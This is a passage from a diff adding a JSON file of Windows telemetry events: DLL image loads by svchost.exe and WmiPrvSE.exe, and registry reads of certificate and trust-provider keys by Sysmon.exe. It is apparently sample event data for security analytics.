131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "twinapi.appcore.dll", + "image_path": "C:\\Windows\\System32\\twinapi.appcore.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": 
"{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "rmclient.dll", + "image_path": "C:\\Windows\\System32\\rmclient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "coml2.dll", + "image_path": "C:\\Windows\\System32\\coml2.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "OneCoreCommonProxyStub.dll", + "image_path": "C:\\Windows\\System32\\OneCoreCommonProxyStub.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "execmodelproxy.dll", + "image_path": "C:\\Windows\\System32\\execmodelproxy.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\BITS", + "registry_value": "BITS", 
+ "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "registry", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\BITS", + "registry_value": "BITS", + "timestamp": 131883573478860000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "ResourcePolicyClient.dll", + "image_path": "C:\\Windows\\System32\\ResourcePolicyClient.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "vssapi.dll", + "image_path": "C:\\Windows\\System32\\vssapi.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "vsstrace.dll", + "image_path": "C:\\Windows\\System32\\vsstrace.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "samcli.dll", + "image_path": "C:\\Windows\\System32\\samcli.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "samlib.dll", + "image_path": "C:\\Windows\\System32\\samlib.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": 
"C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "es.dll", + "image_path": "C:\\Windows\\System32\\es.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479009984, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 6868, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-CBE1-5C05-0000-0010A0235501}" + }, + { + "event_type": "image_load", + "image_name": "BitsProxy.dll", + "image_path": "C:\\Windows\\System32\\BitsProxy.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software 
Publishing", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "esentprf.dll", + "image_path": "C:\\Windows\\System32\\esentprf.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479330000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "secur32.dll", + "image_path": "C:\\Windows\\System32\\secur32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\System32\\ole32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + 
"image_path": "C:\\Windows\\System32\\windows.storage.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\System32\\profapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\System32\\powrprof.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\System32\\fltLib.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "dnsapi.dll", + "image_path": "C:\\Windows\\System32\\dnsapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": 
"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": 
"Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cryptsp.dll", + "image_path": "C:\\Windows\\System32\\cryptsp.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": 
"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "wkscli.dll", + "image_path": "C:\\Windows\\System32\\wkscli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "cscapi.dll", + "image_path": "C:\\Windows\\System32\\cscapi.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "netutils.dll", + "image_path": "C:\\Windows\\System32\\netutils.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "msdtcuiu.dll", + "image_path": "C:\\Windows\\System32\\msdtcuiu.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479480000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "browcli.dll", + "image_path": "C:\\Windows\\System32\\browcli.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": 
"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479950016, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "atl.dll", + "image_path": "C:\\Windows\\System32\\atl.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "msdtcprx.dll", + "image_path": "C:\\Windows\\System32\\msdtcprx.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479640000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "image_load", + "image_name": "mtxclu.dll", + "image_path": "C:\\Windows\\System32\\mtxclu.dll", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573479790000, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + 
"registry_value": "Software Publishing", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\System32\\winspool.drv", + "pid": 4292, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573480259984, + "unique_pid": "{42FC7E13-C55B-5C05-0000-001008A91F01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573480420000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 